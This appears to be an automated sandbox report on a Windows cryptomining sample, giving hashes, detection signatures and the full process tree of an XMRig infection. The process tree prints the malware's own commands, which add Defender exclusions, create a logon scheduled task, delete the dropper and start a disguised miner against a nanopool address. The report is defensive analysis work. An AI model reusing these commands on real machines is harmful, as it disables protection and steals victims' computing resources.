Analysis
-
max time kernel
0s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
26/12/2023, 12:44
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
6f7219715d28fc70c643a533dc18ae59.exe
Resource
win7-20231129-en
5 signatures
150 seconds
General
-
Target
6f7219715d28fc70c643a533dc18ae59.exe
-
Size
181KB
-
MD5
6f7219715d28fc70c643a533dc18ae59
-
SHA1
d8564e27b1011742e3ec319e8c82799e09f8de32
-
SHA256
a2da5599a60e8ac42be25c62590b16ead68662e9aa058bb34dd92203c1d5258f
-
SHA512
446314df4b428ec68d51f1fa24b7cbb07f794b74fc3a8ffda83513a05ca63114925c40ba412d9a2f48f51e25e950ef3181766a8b9e9c50542acda98575ff743d
-
SSDEEP
3072:IUK7uTpRT+svVghXku4kzxS6nFMO7DlYH3oeuOV5bY98gCGT5rWzs/lls:pKyFRTbv6hSYx/6O7DlYXoS3bA8gCGTL
Malware Config
Signatures
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral1/memory/1828-161-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-163-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-164-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-166-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-168-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-172-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-179-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-181-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-182-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-180-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-178-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-174-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-169-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-167-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-165-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1828-162-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2776 schtasks.exe 2412 schtasks.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2548 wrote to memory of 3060 2548 6f7219715d28fc70c643a533dc18ae59.exe 33 PID 2548 wrote to memory of 3060 2548 6f7219715d28fc70c643a533dc18ae59.exe 33 PID 2548 wrote to memory of 3060 2548 6f7219715d28fc70c643a533dc18ae59.exe 33 PID 3060 wrote to memory of 2560 3060 cmd.exe 28 PID 3060 wrote to memory of 2560 3060 cmd.exe 28 PID 3060 wrote to memory of 2560 3060 cmd.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"2⤵PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵PID:2560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:2496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'1⤵PID:2472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'1⤵PID:2680
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 32⤵PID:3020
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"'1⤵
- Creates scheduled task(s)
PID:2776
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"' & exit1⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"1⤵PID:1280
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵PID:2948
-
-
C:\Users\Admin\AppData\Roaming\iservices64.exe"C:\Users\Admin\AppData\Roaming\iservices64.exe"2⤵PID:2936
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Roaming\iservices64.exe"3⤵PID:1600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵PID:1292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'1⤵PID:2072
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:1016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'1⤵PID:1640
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:1628
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵PID:1560
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"1⤵PID:1704
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"'1⤵
- Creates scheduled task(s)
PID:2412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"' & exit1⤵PID:696
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Roaming\iservices64.exe"1⤵PID:2252
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=49axpQBmNV26hPsjUZLfcDiuA7ojjMLpw3yi5b1ctbxfXkQwjCReJ9fGReMLE4Xba4LdkHdfZtduEiJbtZeYGvYJA7kFLnk --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D/kfSIUzd5l3u8L1pjMshOBtlSZ9jBIi41GFvyT9Uti" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth2⤵PID:1828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵PID:2680
-